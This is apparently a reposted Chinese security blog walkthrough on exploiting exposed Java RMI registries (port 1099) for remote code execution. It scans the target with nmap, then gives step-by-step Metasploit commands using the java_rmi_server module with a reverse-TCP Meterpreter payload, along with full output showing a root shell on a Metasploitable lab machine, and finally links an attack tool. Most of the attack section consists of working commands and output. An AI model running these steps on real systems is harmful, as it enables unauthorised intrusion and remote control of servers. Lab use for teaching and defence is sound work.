Java RMI漏洞利用(1099/1090对外开放-rce)

admin 2023年3月24日23:37:05评论374 views字数 3656阅读12分11秒阅读模式

Java rmi介绍

Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制,能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。


RMI是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。


对于任何一个以对象为参数的RMI接口,你都可以发一个自己构建的对象,迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。


RMI的传输100%基于反序列化。端口1099。


探测目标rmi

使用Nmap -p 1099 -sV IP地址探测目标的版本信息。

  ~ nmap -sV -p 1099 10.0.2.5Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 09:49 EDTNmap scan report for 10.0.2.5Host is up (0.00034s latency). PORT     STATE SERVICE     VERSION1099/tcp open  Java-rmi Java RMI RegistryMAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)Service Info: Host: localhost Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds

rmi远程命令执行利用方法一:

使用Metasploit 对 rmi RCE漏洞利用。

➜  ~ msfconsole[-] ***rting the Metasploit Framework console.../[-] * WARNING: No database support: No database YAML file[-] ***                                                  IIIIII    dTb.dTb        _.---._  II     4'  v  'B   .'"".'/|`.""'.  II     6.     .P  :  .' / |  `.  :  II     'T;. .;P'  '.'  /  |    `.'  II      'T; ;P'    `. /   |    .'IIIIII     'YvP'       `-.__|__.-'I love shells --egypt       =[ metasploit v5.0.2-dev                           ]+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]+ -- --=[ 2 evasion                                       ]+ -- --=[ ** This is Metasploit 5 development branch **   ]

2、使用exploit/multi/misc/java_rmi_server模块

msf5 > use exploit/multi/misc/java_rmi_servermsf5 exploit(multi/misc/java_rmi_server) > set rhosts 10.0.2.5rhosts => 10.0.2.5

3、设置payload

msf5 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcppayload => java/meterpreter/reverse_tcpmsf5 exploit(multi/misc/java_rmi_server) > set lhost 10.0.2.12lhost => 10.0.2.12

4、检查配置

msf5 exploit(multi/misc/java_rmi_server) > show options Module options (exploit/multi/misc/java_rmi_server):    Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request   RHOSTS     10.0.2.5         yes       The target address range or CIDR identifier   RPORT      1099             yes       The target port (TCP)   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0   SRVPORT    8080             yes       The local port to listen on.   SSL        false            no        Negotiate SSL for incoming connections   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)   URIPATH                     no        The URI to use for this exploit (default is random)  Payload options (java/meterpreter/reverse_tcp):    Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST  10.0.2.12        yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen port  Exploit target:    Id  Name   --  ----   0   Generic (Java Payload)

5、进行漏洞攻击

msf5 exploit(multi/misc/java_rmi_server) > run  [*] Started reverse TCP handler on 10.0.2.12:4444 [*] 10.0.2.5:1099 - Using URL: http://0.0.0.0:8080/RTcs5fWbAmO91i[*] 10.0.2.5:1099 - Local IP: http://192.168.1.34:8080/RTcs5fWbAmO91i[*] 10.0.2.5:1099 - Server started.[*] 10.0.2.5:1099 - Sending RMI Header... [*] 10.0.2.5:1099 - Sending RMI Call...[*] 10.0.2.5:1099 - Replied to request for payload JAR[*] Sending stage (53845 bytes) to 10.0.2.5[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35676) at 2019-07-13 09:54:48 -0400 id[-] 10.0.2.5:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request[*] 10.0.2.5:1099 - Server stopped.[*] Exploit completed, but no session was created.msf5 exploit(multi/misc/java_rmi_server) > sessions -lActive sessions===============  Id  Name  Type                    Information            Connection  --  ----  ----                    -----------            ----------  1         meterpreter java/linux  root @ metasploitable  10.0.2.12:4444 -> 10.0.2.5:35676 (10.0.2.5)msf5 exploit(multi/misc/java_rmi_server) > sessions -i 1[*] Starting interaction with 1...meterpreter > sysinfoComputer    : metasploitableOS          : Linux 2.6.24-16-server (i386)Meterpreter : java/linux

rmi远程命令执行利用方法二

直接下载工具:attackRMI.jar

github地址:
https://github.com/A-D-Team/attackRmi

https://github.com/waderwu/attackRmi



原文始发于微信公众号(红云谈安全):Java RMI漏洞利用(1099/1090对外开放-rce)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月24日23:37:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Java RMI漏洞利用(1099/1090对外开放-rce)https://cn-sec.com/archives/1627768.html

发表评论

匿名网友 填写信息